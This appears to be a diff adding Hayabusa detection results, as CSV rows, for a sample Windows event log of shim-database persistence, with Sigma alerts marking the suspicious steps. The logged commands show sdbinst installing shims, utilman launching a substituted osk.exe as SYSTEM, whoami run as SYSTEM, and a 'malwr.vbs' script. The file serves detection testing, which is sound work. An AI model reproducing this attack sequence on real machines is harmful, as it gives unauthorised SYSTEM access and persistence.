+2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe""   :  Path: C:\osk.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""c:\osk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe   :  Path: C:\Windows\System32\wsqmcons.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader""  :  Path: C:\Windows\System32\schtasks.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\System32\wsqmcons.exe ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0)  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe  :  Path: C:\Windows\System32\AtBroker.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc""   :  Path: C:\Windows\System32\mmc.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb  :  Path: C:\Windows\System32\rundll32.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb""  :  Path: C:\Program Files\Windows NT\Accessories\wordpad.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs  :  Path: C:\Windows\System32\cmd.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff  :  Path: C:\Windows\System32\gpscript.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\servicing\TrustedInstaller.exe  :  Path: C:\Windows\servicing\TrustedInstaller.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
